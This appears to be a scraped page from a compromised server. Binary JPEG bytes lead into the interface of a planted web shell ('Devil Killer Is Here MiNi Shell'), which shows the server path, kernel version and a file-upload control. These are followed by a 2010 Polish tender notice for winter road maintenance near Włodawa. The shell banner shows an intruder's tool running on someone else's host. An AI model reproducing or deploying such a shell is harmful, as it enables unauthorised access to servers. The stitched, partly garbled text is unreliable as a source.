JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100813/220175-N-2010.html

<p class="kh_header"><b>Włodawa: Zimowe utrzymanie dróg w sezonie 2010/2011 tj. zwalczanie śliskości i odśnieżanie dróg wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich we Włodawie:
a)  droga nr 812 (Biała Podlaska - Wisznice - Włodawa - Chełm - Krasnystaw)
     odcinek Wisznice - Łowcza,
b)   droga nr 816 (Terespol - Kodeń - Włodawa - Okopy) 
     odcinek Kodeń - Okopy,
c)  droga nr 818 (Przewłoka - Wyryki Adampol) 
     odcinek Krzywowierzba - Wyryki Adampol,
d)   droga nr 819 (Parczew - Sosnowica - Kołacze - Łowcza - Wola Uhruska) 
     odcinek Sosnowica - Wola Uhruska.</b><br>
<b>Numer ogłoszenia: 220175 - 2010; data zamieszczenia: 13.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg w sezonie 2010/2011 tj. zwalczanie śliskości i odśnieżanie dróg wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich we Włodawie:
a)  droga nr 812 (Biała Podlaska - Wisznice - Włodawa - Chełm - Krasnystaw)
     odcinek Wisznice - Łowcza,
b)   droga nr 816 (Terespol - Kodeń - Włodawa - Okopy) 
     odcinek Kodeń - Okopy,
c)  droga nr 818 (Przewłoka - Wyryki Adampol) 
     odcinek Krzywowierzba - Wyryki Adampol,
d)   droga nr 819 (Parczew - Sosnowica - Kołacze - Łowcza - Wola Uhruska) 
     odcinek Sosnowica - Wola Uhruska..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia

 Zadanie Nr I.	Nośnik  solarki i pługa odśnieżnego -szt. 6
(solarka własna Wykonawcy, pług własny  lub użyczony z RDW)
(zwalczanie śliskości i odśnieżanie)	
	
 Maksymalna ilość pracy - 420	godz./sztukę
Maksymalna ilość dyżuru - 25 godz./sztukę
Zadanie Nr II.	Nośnik piaskarki i pługa odśnieżnego  - szt. 1
(piaskarka i pług własne Wykonawcy lub użyczone z RDW)   
 (zwalczanie śliskości i odśnieżanie)	
	
Maksymalna ilość pracy -350	 godz.
Maksymalna ilość dyżuru - 25 godz.
Zadanie Nr III.	Nośnik pługa odśnieżnego średniego - 2 szt.
(pług własny Wykonawcy lub użyczony z RDW)        (odśnieżanie)	   
	
Maksymalna ilość pracy - 100 godz./sztuka	

Zadanie Nr IV.	Nośnik pługa odśnieżnego ciężkiego - 1 szt 
(pług własny Wykonawcy lub użyczony z RDW)       (odśnieżanie)	
	
Maksymalna ilość pracy - 70	godz.

Zadanie Nr V.	Równiarka    - 3 szt                        (odśnieżanie)	Maksymalna ilość pracy- 80	godz./sztuka

CPV: 90630000-2,   90620000-9

1.  Usługi polegać będą na:
       a)  przygotowaniu nośnika -montaż na nośniku solarki/piaskarki, pługa odśnieżnego, 
            lamp ostrzegawczych,
       b)  zwalczaniu śliskości zimowej i odśnieżaniu nawierzchni dróg według  standardów 
            ustalonych przez Zamawiającego,
       c)  dyżurze sprzętu (przez dyżur sprzętu należy rozumieć podstawienie pojazdu
            samochodowego z osprzętem i obsługą na bazę RDW po wcześniejszym wezwaniu,
       d)  utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji niniejszej 
            umowy wraz z ich obsługą,
       e)  zapewnieniu przez Wykonawcę we własnym zakresie obsługi naprawczo-
            remontowej sprzętu uczestniczącego w świadczeniu usług zarówno własnego
            jak i sprzętu będącego własnością Zamawiającego, współpracującego przy
            realizacji umowy ze sprzętem Wykonawcy,
        f)  wykonaniu na własny koszt konserwacji  (oczyszczenie z rdzy i malowanie)
            sprzętu będącego własnością  Zamawiającego, współpracującego  przy realizacji
            umowy ze sprzętem Wykonawcy  i zwrot do RDW we   Włodawie w terminie 
            do dnia 30.05.2011 r.
2.  Usługi realizowane będą zgodnie ze Specyfikacją techniczną warunków usług 
     związanych z pracą pługów, piaskarek i sprzętu do zimowego utrzymania dróg3.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych).
4.  Oprócz czynności wymienionych w ust 1 pkt. a, b, c, d, e, f do obowiązków Wykonawcy
     należy niezwłoczne przekazywanie za pośrednictwem osób obsługujących
     pojazdy i sprzęt osobom upoważnionym przez Zamawiającego informacji o:
a)	czasie rozpoczęcia i zakończenia pracy na poszczególnych odcinkach dróg,
b)	aktualnym stanie przejezdności dróg,
c)	zagrożeniach spowodowanych warunkami atmosferycznymi,
d)	innych zdarzeniach na drodze zagrażających bezpieczeństwu ruchu.
5.  Zamawiający zabezpieczy i udostępni Wykonawcy materiały do zwalczania
     śliskości. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt.
Szacunkowa wartość zamówienia netto - 636121,50 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w  wysokości :
     a) zadania nr I 	I                   -  500,00 zł za każdą jednostkę
     b) zadanie nr II	                    -  500,00 zł 
     c) zadanie nr III                           -  300,00 zł za każdą jednostkę
     d) zadanie nr IV                          -  300,00 zł.
     e) zadanie nr V                           -  200,00 zł za każdą jednostkę
2. Wadium może być wnoszone w formach określonych w art. 45, ust 6 ustawy
    Prawo zamówień publicznych. 
3. Wadium wnoszone w formie pieniężnej nalezy wpłacić przelewem na konto ZDW
    w Lublinie w Kredyt Banku S.A. O/Lublin nr  89 1500 1520 1215 2004 1596 0000. 
4. Do oferty należy dołączyć dokument potwierdzający wniesienie wadium. 
UWAGA: 
1) Wadium w formie pieniężnej należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn przelewem na rachunek bankowy wskazany przez zamawiającego. 
W myśl art. 63 ust. 3 pkt. 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 r (Dz.U z 2002 nr 72 poz 665 j.t.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu powyższych przepisów, 
2) Wadium uważa się za wniesione w terminie jeżeli wpłynie na k-to ZDW w Lublinie przed upływem terminu składania ofert.
4. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:
    1) Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w
        sprawie zamówienia publicznego na warunkach określonych w ofercie,
    2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
       przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania potencjałem technicznym
          niezbędnym do wykonania zamówienia Wykonawca winien dysponować jednostkami
          sprzętu i transportu w ilości zgodnej z ofertą
          - solarka (pojazd samochodowy o ład. min 8 t z zamontowaną solarką należącą do Wykonawcy),
          - nośnik piaskarki (pojazd samochodowy o ładowności min. 8 t)
          - nośnik pługa średniego (pojazd samochodowy o ładowności min. 8 t)
          - nośnik pługa ciężkiego (pojazd samochodowy o ładowności min. 12 t)
          - sprzęt do załadunku mieszanki lub soli,
          - wytwornica solanki,
          - równiarka.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania
          zamówienia Wykonawca winien dysponować minimum jedną osobą, która będzie 
          uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do kierowania
          pojazdami oraz uprawnienia maszynisty
          - osobą/osobami  posiadającą odpowiednie uprawnienia do kierowania pojazdami w 
             przypadku nośników  solarek, piaskarek i pługów,
         - osobą posiadającą uprawnienia maszynisty  
            w ilości odpowiadającej zaoferowanej .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń i dokumentów jakie należy dostarczyć w celu potwierdzenia
    spełniania warunków udziału w postępowaniu, Wykonawca obowiązany jest dołączyć do oferty:
      1) Dowód wniesienia wadium.
      2) Ofertę przetargową (z ceną netto i z podatkiem VAT- wzór - zał. A), 
3)	Zaakceptowany wzór umowy (zał. H)
      4)  Wykaz części zamówienia których wykonanie Wykonawca zamierza powierzyć
           podwykonawcy, (wzór zał. J)
      5) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
          do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
          pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
          albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
          publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
      6) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które 
          nie są  wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument
          potwierdzający prawo do reprezentowania podmiotu przez osobę /osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do
    treści oferty:
a)	zmiana wynagrodzenia w przypadku zmiany stawek podatku VAT,
b)	zmiana osób kluczowych dla realizacji umowy np. osób reprezentujących strony w przypadku wystąpienia którejkolwiek niezależnych od stron z okoliczności:
- choroba,
- wypadki losowe,
- zmiany organizacyjne.
2. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie
     umowy nie leży w interesie publicznym, czego nie można było przewidzieć 
     w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 
     30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 
    22-200 Włodawa, ul Lubelska 60  pokój nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2010 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 
    22-200 Włodawa, ul Lubelska 60  pokój nr 15 /sekretariat/ 1 piętro
Otwarcie ofert 24.08.2010 r godz. 09:10 pokój nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz
     informacje przekazywane będą faksem lub drogą elektroniczną  .
2.  Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia
     lub inne informacje za pomocą faksu lub drogą elektroniczną na adres e-mail 
     rdw.wlodawa@zdw.lublin.pl, każda ze stron na żądanie drugiej niezwłocznie potwierdza
     fakt ich otrzymania.
3. Osobami uprawnionymi do porozumiewania się z Wykonawcami w imieniu
    Zamawiającego są:
    1) w sprawach technicznych:  Krystyna Kowalewska, pok. Nr 4 w godz. 7 - 15 
        tel.:   82 57 21 952, faks:  82 57 24 162 e-mail rdw.wlodawa@zdw.lublin.pl
   2) w sprawach formalno - prawnych związanych z postępowaniem o udzielenie 
       zamówienia i zawarciem umowy: Barbara Winiarczyk, Eugeniusz Kiewczykowski 
       pok. Nr 2 w godz. 7 - 15 
       tel.:    82 57 21 635, faks:  82 57 24 162,  e-mail  rdw.wlodawa@zdw.lublin.pl
4. Ponieważ wartość przedmiotowego postępowania jest mniejsza niż kwoty określone na
    podstawie art. 11 ust. 8 ustawy Pzp Wykonawcom, przysługuje możliwość wniesienia
    odwołania wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.
5. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej zgodnie z art. 180 ustawy z
    dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r.  
    Nr 113, poz. 759)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr I Nośnik solarki i pługa odśnieżnego 
(solarka własna Wykonawcy, pług własny lub użyczony z RDW) - 6 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zwalczanie śliskośći zimowej i odśnieżanie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr II Nośnik piaskarki (piaskarka własna Wykonawcy lub użyczona z RDW) - szt 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zwalczanie śliskości zimowej i odśnieżanie dróg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr III Nośnik pługa odśnieżnego średniego - 2 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odśnieżanie dróg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
